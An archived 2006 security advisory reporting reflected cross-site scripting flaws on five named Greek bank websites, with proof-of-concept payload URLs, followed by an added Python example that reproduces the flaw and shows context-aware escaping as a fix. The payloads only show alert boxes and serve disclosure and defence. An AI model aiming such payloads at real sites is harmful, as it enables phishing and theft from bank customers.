Full Disclosure mailing list archives
Cross Site Scripting at Several Greek Banks.
From: "Sentinel" <info () sentinel gr>
Date: Wed, 20 Sep 2006 09:59:15 +0300
Sentinel Computer Security Advisory

Sentinel Co.
http://www.sentinel.gr
info () sentinel gr

General Flaw Description : Cross Site Scripting Vulnerabilities in multiple
                           Greek Web Banking sites.

-------------------------------------------------------------------------------
Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date    : 2006/09/01
Advisory ID              : SGA-0002
Extends                  : None
Deprecates               : None

-------------------------------------------------------------------------------
Product Information
-------------------------------------------------------------------------------
Flawed File Name         : http://www.eurobank.gr/online/home/pops.aspx,
                           http://www.winbank.gr/eCPage.asp,
                           http://www.emporiki.gr/cbg/gr/search/search.jsp,
                           http://www.piraeusbank.gr/ecportal.asp,
                           http://www.probank.gr/search/index.php

-------------------------------------------------------------------------------
Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type                : Cross Site Scripting
Vulnerability Impact     : Phishing and Scam attacks
Vulnerability Rating     : Critical
Patch Status             : Partially Patched
Advisory Status          : Verified
Publicity Level          : Published
Other Advisories IDs     : None
Flaw Discovery Date      : 2006/08/31
Patch Date               : 2006/09/02
Vulnerability Credit     : Emmanouil Gavriil (egavriil () sentinel gr)
Exploit Status           : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------

Description
-----------
Many Greek banks use a Web Banking service to assist their customers with
their transactions. Eurobank, Winbank, Piraeus Bank, Probank and Emporiki Bank
were found to be vulnerable to Cross Site Scripting attacks, which can lead to
execution of arbitrary SCRIPT and HTML code in the user's browser.

Technical Information
---------------------
www.eurobank.gr makes use of multiple aspx files which fail to sanitise
variables. Most of the aspx files on the Eurobank website that take variables
as input are vulnerable to XSS.

www.winbank.gr uses a search function which does not properly sanitise the
input of the variable text_search.

www.emporiki.gr uses a jsp search function which does not properly sanitise
the input of the variable searchFld.

www.piraeusbank.gr has exactly the same problem as Winbank, as it is actually
the same bank. Even though it does not have a Web Banking system itself, it
forwards Web Banking requests to winbank. Cross Site Scripting is possible,
and thus the danger is the same, as an unsuspecting user can be led from
www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr login
screen.

www.probank.gr does not have a Web Banking service, but the site is vulnerable
to XSS, and while account compromise is not possible, valuable information
such as CARD and PIN numbers can be stolen through phishing/scam attacks.

Proof of Concept Experiment
---------------------------
http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

Patch Description and Information
---------------------------------
The banks have been informed. All banks except Emporiki Bank have fixed the
vulnerability.

References and Other Resources for Information
----------------------------------------------
None.

EOF.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
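The flaw class described in the advisory (a search parameter echoed into the response without sanitisation), shown next to a context-aware fix. This is an added example, not part of the advisory or any bank's code; the page template and the function names are hypothetical, and the sample inputs are the decoded payload strings already present in the proof-of-concept URLs above.

```python
import html
import json

# Sample inputs: decoded strings from the advisory's proof-of-concept URLs.
SAMPLES = [
    "<script>alert('XSS')</script>",             # targets HTML body context
    "';alert(String.fromCharCode(88,83,83))//",  # targets a JS string literal
]

def render_vulnerable(term: str) -> str:
    """'Before': the parameter is concatenated into the page unmodified,
    once in HTML body context and once inside a JavaScript string."""
    return (
        "<p>Results for: " + term + "</p>\n"
        "<script>var lastQuery = '" + term + "';</script>"
    )

def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal that is safe inside an
    inline <script> block. json.dumps quotes and backslash-escapes the value
    (and, with its default ensure_ascii=True, escapes U+2028/U+2029); the
    extra replacements stop it from closing the script element or a quote."""
    out = json.dumps(value)
    for ch in "<>&'":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out

def render_hardened(term: str) -> str:
    """'After': each sink gets the encoding that matches its context."""
    return (
        "<p>Results for: " + html.escape(term, quote=True) + "</p>\n"
        "<script>var lastQuery = " + js_string_literal(term) + ";</script>"
    )

def reflected_verbatim(page: str, term: str) -> bool:
    """Regression check: does the raw input appear unencoded in the page?"""
    return term in page

if __name__ == "__main__":
    for s in SAMPLES:
        print("input     :", s)
        print("vulnerable:", reflected_verbatim(render_vulnerable(s), s))
        print("hardened  :", reflected_verbatim(render_hardened(s), s))
```

HTML entity encoding alone would not be enough for the second sink: inside a script block the browser does not decode entities, which is why the JavaScript string gets its own encoder.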